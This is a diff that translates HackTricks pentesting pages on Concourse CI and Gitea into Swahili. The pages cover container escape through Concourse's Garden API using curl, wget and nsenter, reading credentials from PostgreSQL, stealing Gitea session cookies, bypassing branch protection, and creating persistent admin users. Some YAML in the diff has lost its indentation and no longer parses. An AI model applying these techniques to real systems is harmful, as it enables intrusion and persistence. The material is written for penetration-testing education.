+Unaweza kutumia akreditivu hizo ku **ingia kwenye seva ya wavuti** na **kuunda kontena lenye mamlaka na kutoroka hadi kwenye node**.
-You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**.
-
-In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
-
+Katika mazingira unaweza pia kupata taarifa za **kufikia postgresql** ambayo concourse inatumia (anwani, **jina la mtumiaji**, **nenosiri** na hifadhidata pamoja na taarifa nyingine):
```bash
env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
@@ -344,39 +327,35 @@ select * from refresh_token;
select * from teams; #Change the permissions of the users in the teams
select * from users;
```
-
-#### Abusing Garden Service - Not a real Attack
+#### Kutumia Huduma ya Garden - Si Shambulio Halisi
> [!WARNING]
-> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
+> Hizi ni baadhi ya maelezo ya kuvutia kuhusu huduma, lakini kwa sababu inasikiliza tu kwenye localhost, maelezo haya hayataleta athari ambazo hatujashambulia tayari
-By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections:
+Kwa default, kila mfanyakazi wa concourse atakuwa akifanya kazi na huduma ya [**Garden**](https://github.com/cloudfoundry/garden) kwenye bandari 7777. Huduma hii inatumika na Mkurugenzi wa Mtandao kuonyesha mfanyakazi **kile anahitaji kutekeleza** (kupakua picha na kuendesha kila kazi). Hii inasikika vizuri kwa mshambuliaji, lakini kuna ulinzi mzuri:
-- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
-- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
-
-Concourse workers run with high container privileges:
+- Inapatikana tu **kitaifa** (127..0.0.1) na nadhani wakati mfanyakazi anajiandikisha dhidi ya Mtandao na huduma maalum ya SSH, tunnel inaundwa ili seva ya wavuti iweze **kuzungumza na kila huduma ya Garden** ndani ya kila mfanyakazi.
+- Seva ya wavuti **inasimamia kontena zinazoendesha kila sekunde chache**, na kontena **zisizotarajiwa** zinatolewa. Hivyo ikiwa unataka **kuendesha kontena maalum** unahitaji **kuingilia** kati ya **mawasiliano** kati ya seva ya wavuti na huduma ya garden.
+Wafanyakazi wa Concourse wanaendesha kwa ruhusa za juu za kontena:
```
Container Runtime: docker
Has Namespaces:
- pid: true
- user: false
+pid: true
+user: false
AppArmor Profile: kernel
Capabilities:
- BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
+BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled
```
-
-However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated.
+Hata hivyo, mbinu kama **kuunganisha** kifaa cha /dev cha node au release_agent **hazitafanya kazi** (kwa sababu kifaa halisi chenye mfumo wa faili wa node hakiwezi kupatikana, ni kifaa cha virtual tu). Hatuwezi kufikia michakato ya node, hivyo kutoroka kutoka kwa node bila exploits za kernel kunakuwa ngumu.
> [!NOTE]
-> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
+> Katika sehemu iliyopita tuliona jinsi ya kutoroka kutoka kwa kontena lenye mamlaka, hivyo ikiwa tunaweza **kutekeleza** amri katika **kontena lenye mamlaka** lililoundwa na **mfanyakazi** **wa sasa**, tunaweza **kutoroka hadi node**.
-Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
-
-**Getting inside a running privileged container**
+Kumbuka kwamba nilipokuwa nikicheza na concourse niliona kwamba wakati kontena jipya linazaliwa ili kuendesha kitu, michakato ya kontena inapatikana kutoka kwa kontena la mfanyakazi, hivyo ni kama kontena kuunda kontena jipya ndani yake.
+**Kuingia ndani ya kontena lenye mamlaka linaloendesha**
```bash
# Get current container
curl 127.0.0.1:7777/containers
@@ -389,30 +368,26 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
# Execute a new process inside a container
## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
- --header='Content-Type:application/json' \
- 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
+--header='Content-Type:application/json' \
+'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
```
+**Kuunda kontena mpya yenye mamlaka**
-**Creating a new privileged container**
-
-You can very easily create a new container (just run a random UID) and execute something on it:
-
+Unaweza kwa urahisi kuunda kontena mpya (kimbia tu UID isiyo ya kawaida) na kutekeleza kitu ndani yake:
```bash
curl -X POST http://127.0.0.1:7777/containers \
- -H 'Content-Type: application/json' \
- -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
+-H 'Content-Type: application/json' \
+-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
# Wget will be stucked there as long as the process is being executed
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
- --header='Content-Type:application/json' \
- 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
+--header='Content-Type:application/json' \
+'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
```
-
-However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers:
-
+Hata hivyo, seva ya wavuti inakagua kila sekunde chache kontena zinazotembea, na ikiwa kontena isiyotarajiwa itagundulika, itafutwa. Kadri mawasiliano yanavyofanyika katika HTTP, unaweza kuingilia mawasiliano ili kuepuka kufutwa kwa kontena zisizotarajiwa:
```
GET /containers HTTP/1.1.
Host: 127.0.0.1:7777.
@@ -434,13 +409,8 @@ Host: 127.0.0.1:7777.
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.
```
-
-## References
+## Marejeo
- https://concourse-ci.org/vars.html
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
index 0cc6363a7..9f2223acf 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
@@ -8,19 +8,16 @@
#### With Docker-Compose
-This docker-compose file simplifies the installation to do some tests with concourse:
-
+Hii faili ya docker-compose inarahisisha usakinishaji ili kufanya majaribio na concourse:
```bash
wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
docker-compose up -d
```
+Unaweza kupakua amri ya `fly` kwa ajili ya OS yako kutoka mtandao katika `127.0.0.1:8080`
-You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
-
-#### With Kubernetes (Recommended)
-
-You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
+#### Kwa Kubernetes (Inapendekezwa)
+Unaweza kwa urahisi kupeleka concourse katika **Kubernetes** (katika **minikube** kwa mfano) kwa kutumia helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
```bash
brew install helm
helm repo add concourse https://concourse-charts.storage.googleapis.com/
@@ -31,94 +28,90 @@ helm install concourse-release concourse/concourse
# If you need to delete it
helm delete concourse-release
```
-
-After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets:
-
+Baada ya kuunda mazingira ya concourse, unaweza kuunda siri na kutoa ufikiaji kwa SA inayotembea katika concourse web ili kufikia siri za K8s:
```yaml
echo 'apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
- name: read-secrets
+name: read-secrets
rules:
- apiGroups: [""]
- resources: ["secrets"]
- verbs: ["get"]
+resources: ["secrets"]
+verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
- name: read-secrets-concourse
+name: read-secrets-concourse
roleRef:
- apiGroup: rbac.authorization.k8s.io
- kind: ClusterRole
- name: read-secrets
+apiGroup: rbac.authorization.k8s.io
+kind: ClusterRole
+name: read-secrets
subjects:
- kind: ServiceAccount
- name: concourse-release-web
- namespace: default
+name: concourse-release-web
+namespace: default
---
apiVersion: v1
kind: Secret
metadata:
- name: super
- namespace: concourse-release-main
+name: super
+namespace: concourse-release-main
type: Opaque
data:
- secret: MWYyZDFlMmU2N2Rm
+secret: MWYyZDFlMmU2N2Rm
' | kubectl apply -f -
```
-
### Create Pipeline
-A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
+Pipeline inajumuisha orodha ya [Jobs](https://concourse-ci.org/jobs.html) ambayo ina orodha iliyopangwa ya [Steps](https://concourse-ci.org/steps.html).
### Steps
-Several different type of steps can be used:
+Aina kadhaa tofauti za hatua zinaweza kutumika:
-- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)
-- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
-- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
-- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
-- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
-- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
-- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
-- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
-- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
+- **hatua ya** [**`task` step**](https://concourse-ci.org/task-step.html) **inaendesha** [**task**](https://concourse-ci.org/tasks.html)
+- hatua ya [`get` step](https://concourse-ci.org/get-step.html) inapata [resource](https://concourse-ci.org/resources.html)
+- hatua ya [`put` step](https://concourse-ci.org/put-step.html) inasasisha [resource](https://concourse-ci.org/resources.html)
+- hatua ya [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) inakamilisha [pipeline](https://concourse-ci.org/pipelines.html)
+- hatua ya [`load_var` step](https://concourse-ci.org/load-var-step.html) inachukua thamani katika [local var](https://concourse-ci.org/vars.html#local-vars)
+- hatua ya [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) inaendesha hatua kwa pamoja
+- hatua ya [`do` step](https://concourse-ci.org/do-step.html) inaendesha hatua kwa mpangilio
+- mrekebishaji wa hatua ya [`across` step](https://concourse-ci.org/across-step.html#schema.across) inaendesha hatua mara nyingi; mara moja kwa kila mchanganyiko wa thamani za mabadiliko
+- hatua ya [`try` step](https://concourse-ci.org/try-step.html) inajaribu kuendesha hatua na inafanikiwa hata kama hatua inashindwa
-Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step.
+Kila [step](https://concourse-ci.org/steps.html) katika [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) inaendesha katika **konteina yake mwenyewe**. Unaweza kuendesha chochote unachotaka ndani ya konteina _(yaani, endesha majaribio yangu, endesha hii bash script, jenga picha hii, nk.)_. Hivyo basi, ikiwa una kazi yenye hatua tano, Concourse itaunda konteina tano, moja kwa kila hatua.
-Therefore, it's possible to indicate the type of container each step needs to be run in.
+Kwa hiyo, inawezekana kuashiria aina ya konteina ambayo kila hatua inahitaji kuendesha ndani yake.
### Simple Pipeline Example
-
```yaml
jobs:
- - name: simple
- plan:
- - task: simple-task
- privileged: true
- config:
- # Tells Concourse which type of worker this task should run on
- platform: linux
- image_resource:
- type: registry-image
- source:
- repository: busybox # images are pulled from docker hub by default
- run:
- path: sh
- args:
- - -cx
- - |
- sleep 1000
- echo "$SUPER_SECRET"
- params:
- SUPER_SECRET: ((super.secret))
+- name: simple
+plan:
+- task: simple-task
+privileged: true
+config:
+# Tells Concourse which type of worker this task should run on
+platform: linux
+image_resource:
+type: registry-image
+source:
+repository: busybox # images are pulled from docker hub by default
+run:
+path: sh
+args:
+- -cx
+- |
+sleep 1000
+echo "$SUPER_SECRET"
+params:
+SUPER_SECRET: ((super.secret))
```
```bash
@@ -130,26 +123,21 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch
# From another console
fly -t tutorial intercept --job pipe-name/simple
```
-
Check **127.0.0.1:8080** to see the pipeline flow.
### Bash script with output/input pipeline
-It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**.
+Ni **uwezekano wa kuhifadhi matokeo ya kazi moja kwenye faili** na kuashiria kwamba ni pato na kisha kuashiria ingizo la kazi inayofuata kama pato la kazi ya awali. Kile ambacho concourse hufanya ni **kuweka saraka ya kazi ya awali katika kazi mpya ambapo unaweza kufikia faili zilizoundwa na kazi ya awali**.
### Triggers
-You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:
+Huhitaji kuanzisha kazi kwa mikono kila wakati unapotaka kuzifanya, unaweza pia kuzipanga zifanyike kila wakati:
-- Some time passes: [Time resource](https://github.com/concourse/time-resource/)
-- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
-- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
-- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
+- Wakati fulani unapita: [Time resource](https://github.com/concourse/time-resource/)
+- Kwa kujitolea mpya kwenye tawi kuu: [Git resource](https://github.com/concourse/git-resource)
+- PR mpya: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
+- Pakua au sukuma picha ya hivi karibuni ya programu yako: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
-Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
+Angalia mfano wa YAML pipeline unaoanzisha kwenye kujitolea mpya kwa master katika [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/gitea-security/README.md b/src/pentesting-ci-cd/gitea-security/README.md
index bf4f6485a..b8f58c3dc 100644
--- a/src/pentesting-ci-cd/gitea-security/README.md
+++ b/src/pentesting-ci-cd/gitea-security/README.md
@@ -4,7 +4,7 @@
## What is Gitea
-**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
+**Gitea** ni **ufumbuzi wa mwenyeji wa jamii unaosimamiwa kwa urahisi wa kuhifadhi msimbo** ulioandikwa kwa Go.
.png>)
@@ -16,127 +16,115 @@ basic-gitea-information.md
## Lab
-To run a Gitea instance locally you can just run a docker container:
-
+Ili kuendesha mfano wa Gitea kwa ndani unaweza tu kuendesha kontena la docker:
```bash
docker run -p 3000:3000 gitea/gitea
```
-
Connect to port 3000 to access the web page.
You could also run it with kubernetes:
-
```
helm repo add gitea-charts https://dl.gitea.io/charts/
helm install gitea gitea-charts/gitea
```
+## Uainishaji Usio na Uthibitisho
-## Unauthenticated Enumeration
+- Repos za umma: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
+- Watumiaji waliosajiliwa: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
+- Mashirika yaliyojregistered: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
-- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
-- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
-- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
+Kumbuka kwamba kwa **kawaida Gitea inaruhusu watumiaji wapya kujiandikisha**. Hii haitatoa ufikiaji wa kuvutia kwa watumiaji wapya juu ya repos za mashirika/watumiaji wengine, lakini **mtumiaji aliyeingia** anaweza kuwa na uwezo wa **kuangalia repos au mashirika zaidi**.
-Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**.
+## Ukatili wa Ndani
-## Internal Exploitation
+Kwa hali hii tunaenda kudhani kwamba umepata ufikiaji wa akaunti ya github.
-For this scenario we are going to suppose that you have obtained some access to a github account.
+### Kwa Misingi ya Mtumiaji/Keki ya Mtandao
-### With User Credentials/Web Cookie
+Ikiwa kwa namna fulani tayari una misingi ya mtumiaji ndani ya shirika (au umepora keki ya kikao) unaweza **kuingia tu** na kuangalia ni **idhana gani una** juu ya **repos,** katika **timu zipi** ulizo, **orodhesha watumiaji wengine**, na **repos zimewezeshwaje.**
-If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.**
-
-Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
+Kumbuka kwamba **2FA inaweza kutumika** hivyo utaweza kufikia habari hii tu ikiwa unaweza pia **kupita ukaguzi huo**.
> [!NOTE]
-> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
+> Kumbuka kwamba ikiwa **utafanikiwa kupora keki ya `i_like_gitea`** (sasa imewekwa na SameSite: Lax) unaweza **kujifanya kuwa mtumiaji** bila kuhitaji misingi au 2FA.
-### With User SSH Key
+### Kwa Funguo za SSH za Mtumiaji
-Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
-
-With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to:
+Gitea inaruhusu **watumiaji** kuweka **funguo za SSH** ambazo zitatumika kama **njia ya uthibitisho ya kupeleka msimbo** kwa niaba yao (hakuna 2FA inayotumika).
+Kwa funguo hii unaweza kufanya **mabadiliko katika repos ambapo mtumiaji ana baadhi ya mamlaka**, hata hivyo huwezi kuitumia kufikia api ya gitea ili kuainisha mazingira. Hata hivyo, unaweza **kuainisha mipangilio ya ndani** ili kupata habari kuhusu repos na mtumiaji ulionao ufikiaji:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
+Ikiwa mtumiaji ameweka jina lake la mtumiaji kama jina lake la gitea unaweza kufikia **funguo za umma alizoweka** katika akaunti yake kwenye _https://github.com/\.keys_, unaweza kuangalia hili kuthibitisha kuwa funguo binafsi ulizozipata zinaweza kutumika.
-If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used.
+**Funguo za SSH** pia zinaweza kuwekwa katika hifadhi kama **funguo za kutekeleza**. Mtu yeyote mwenye ufikiaji wa funguo hii ataweza **kuanzisha miradi kutoka kwenye hifadhi**. Kawaida katika seva yenye funguo tofauti za kutekeleza, faili ya ndani **`~/.ssh/config`** itakupa taarifa kuhusu funguo inayohusiana.
-**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
+#### Funguo za GPG
-#### GPG Keys
-
-As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
-
-Check locally if the current user has any key with:
+Kama ilivyoelezwa [**hapa**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) wakati mwingine inahitajika kusaini ahadi au unaweza kugundulika.
+Angalia kwa ndani ikiwa mtumiaji wa sasa ana funguo yoyote kwa:
```shell
gpg --list-secret-keys --keyid-format=long
```
+### Kwa Token ya Mtumiaji
-### With User Token
+Kwa utangulizi kuhusu [**Token za Mtumiaji angalia taarifa za msingi**](basic-gitea-information.md#personal-access-tokens).
-For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
+Token ya mtumiaji inaweza kutumika **badala ya nenosiri** ili **kuhakiki** dhidi ya seva ya Gitea [**kupitia API**](https://try.gitea.io/api/swagger#/). itakuwa na **ufikiaji kamili** juu ya mtumiaji.
-A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user.
+### Kwa Programu ya Oauth
-### With Oauth Application
+Kwa utangulizi kuhusu [**Programu za Gitea Oauth angalia taarifa za msingi**](./#with-oauth-application).
-For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application).
+Mshambuliaji anaweza kuunda **Programu ya Oauth yenye uharibifu** ili kupata data/hatua za kibali za watumiaji wanaokubali labda kama sehemu ya kampeni ya uvuvi.
-An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+Kama ilivyoelezwa katika taarifa za msingi, programu itakuwa na **ufikiaji kamili juu ya akaunti ya mtumiaji**.
-As explained in the basic information, the application will have **full access over the user account**.
+### Kupita Ulinzi wa Tawi
-### Branch Protection Bypass
+Katika Github tuna **github actions** ambazo kwa default hupata **token yenye ufikiaji wa kuandika** juu ya repo ambayo inaweza kutumika **kupita ulinzi wa tawi**. Katika kesi hii hiyo **haipo**, hivyo kupita ni mdogo zaidi. Lakini hebu tuangalie kile kinachoweza kufanywa:
-In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done:
+- **Washa Push**: Ikiwa mtu yeyote mwenye ufikiaji wa kuandika anaweza kusukuma kwenye tawi, sukuma tu.
+- **Orodha ya Push zilizozuiliwa**: Kwa njia ile ile, ikiwa wewe ni sehemu ya orodha hii sukuma kwenye tawi.
+- **Washa Orodha ya Merging**: Ikiwa kuna orodha ya merging, unahitaji kuwa ndani yake.
+- **Hitaji idhini ni kubwa kuliko 0**: Kisha... unahitaji kumaliza mtumiaji mwingine.
+- **Zuia idhini kwa watumiaji waliotajwa**: Ikiwa ni watumiaji waliotajwa pekee wanaweza kuidhinisha... unahitaji kumaliza mtumiaji mwingine aliye ndani ya orodha hiyo.
+- **Futa idhini za zamani**: Ikiwa idhini haziondolewa na commits mpya, unaweza kuingilia PR iliyothibitishwa tayari ili kuingiza msimbo wako na kuunganisha PR.
-- **Enable Push**: If anyone with write access can push to the branch, just push to it.
-- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch.
-- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it
-- **Require approvals is bigger than 0**: Then... you need to compromise another user
-- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list
-- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR.
+Kumbuka kwamba **ikiwa wewe ni admin wa org/repo** unaweza kupita ulinzi.
-Note that **if you are an org/repo admin** you can bypass the protections.
+### Kuorodhesha Webhooks
-### Enumerate Webhooks
+**Webhooks** zinaweza **kutuma taarifa maalum za gitea mahali fulani**. Unaweza kuwa na uwezo wa **kuitumia mawasiliano hayo**.\
+Hata hivyo, kawaida **siri** ambayo huwezi **kuipata** imewekwa katika **webhook** ambayo itazuiya watumiaji wa nje wanaojua URL ya webhook lakini si siri kuweza **kuitumia webhook hiyo**.\
+Lakini katika matukio mengine, watu badala ya kuweka **siri** mahali pake, wana **iweka katika URL** kama parameter, hivyo **kuangalia URLs** kunaweza kukuruhusu **kupata siri** na maeneo mengine ambayo unaweza kuendeleza zaidi.
-**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
-However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
-But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further.
+Webhooks zinaweza kuwekwa katika **repo na katika kiwango cha org**.
-Webhooks can be set at **repo and at org level**.
+## Baada ya Kutumia
-## Post Exploitation
+### Ndani ya seva
-### Inside the server
+Ikiwa kwa namna fulani umeweza kuingia ndani ya seva ambapo gitea inafanya kazi unapaswa kutafuta faili ya usanidi wa gitea. Kwa default iko katika `/data/gitea/conf/app.ini`
-If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`
+Katika faili hii unaweza kupata **funguo** na **nenosiri**.
-In this file you can find **keys** and **passwords**.
+Katika njia ya gitea (kwa default: /data/gitea) unaweza pia kupata taarifa za kuvutia kama:
-In the gitea path (by default: /data/gitea) you can find also interesting information like:
+- DB ya **sqlite**: Ikiwa gitea haitumii db ya nje itatumia db ya sqlite.
+- **sessions** ndani ya folda za sessions: Ukikimbia `cat sessions/*/*/*` unaweza kuona majina ya watumiaji walioingia (gitea inaweza pia kuhifadhi sessions ndani ya DB).
+- **jwt private key** ndani ya folda ya jwt.
+- Taarifa zaidi **nyeti** zinaweza kupatikana katika folda hii.
-- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db
-- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB).
-- The **jwt private key** inside the jwt folder
-- More **sensitive information** could be found in this folder
+Ikiwa uko ndani ya seva unaweza pia **kutumia `gitea` binary** kupata/kubadilisha taarifa:
-If you are inside the server you can also **use the `gitea` binary** to access/modify information:
-
-- `gitea dump` will dump gitea and generate a .zip file
-- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence)
-- `gitea admin user change-password --username admin --password newpassword` Change the password
-- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token
+- `gitea dump` itatoa gitea na kuunda faili .zip.
+- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` itaunda token ya aina iliyoonyeshwa (kuhifadhi).
+- `gitea admin user change-password --username admin --password newpassword` Badilisha nenosiri.
+- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Unda mtumiaji mpya wa admin na pata token ya ufikiaji.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
index e6e4d9ba3..f61b898c3 100644
--- a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
+++ b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
@@ -4,104 +4,100 @@
## Basic Structure
-The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
